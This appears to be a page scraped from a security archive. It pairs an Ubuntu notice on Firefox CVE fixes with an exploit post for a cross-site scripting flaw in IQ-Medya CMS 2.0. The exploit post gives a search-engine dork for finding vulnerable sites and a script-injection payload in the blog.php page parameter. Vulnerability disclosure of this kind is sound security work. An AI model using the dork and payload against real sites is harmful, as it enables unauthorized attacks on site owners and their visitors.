    ==========================================================================Ubuntu Security Notice USN-6320-1August 30, 2023firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-4573,CVE-2023-4574, CVE-2023-4575, CVE-2023-4578, CVE-2023-4581, CVE-2023-4583,CVE-2023-4584, CVE-2023-4585)Lukas Bernhard discovered that Firefox did not properly manage memory whenthe "UpdateRegExpStatics" attempted to access "initialStringHeap". Anattacker could potentially exploit this issue to cause a denial of service.(CVE-2023-4577)Malte Jürgens discovered that Firefox did not properly handle searchqueries if the search query itself was a well formed URL. An attacker couldpotentially exploit this issue to perform spoofing attacks. (CVE-2023-4579)Harveer Singh discovered that Firefox did not properly handle pushnotifications stored on disk in private browsing mode. An attacker couldpotentially exploits this issue to access sensitive information.(CVE-2023-4580)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         117.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6320-1  CVE-2023-4573, CVE-2023-4574, CVE-2023-4575, CVE-2023-4577,  CVE-2023-4578, CVE-2023-4579, CVE-2023-4580, CVE-2023-4581,  CVE-2023-4583, CVE-2023-4584, CVE-2023-4585Package Information:  https://launchpad.net/ubuntu/+source/firefox/117.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6320-1

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

**IQ-Medya CMS 2.0 Cross Site Scripting**

Posted Aug 30, 2023

Authored by indoushka

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ab1e62fc2de79708c62ff8ba7205592a862ce474915df4ff25b9a691573bdc26

Download | Favorite | View

**IQ-Medya CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : İQ-Medya CMS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,058)
*   Arbitrary (16,220)
*   BBS (2,859)
*   Bypass (1,741)
*   CGI (1,026)
*   Code Execution (7,285)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,462)
*   Encryption (2,370)
*   Exploit (52,004)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,046)
*   JavaScript (859)
*   Kernel (6,696)
*   Local (14,466)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,340)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,817)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,188)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,798)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,974)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,555)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,781)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,852)
*   UNIX (9,302)
*   UnixWare (186)
*   Windows (6,579)
*   Other

Tag

#firefox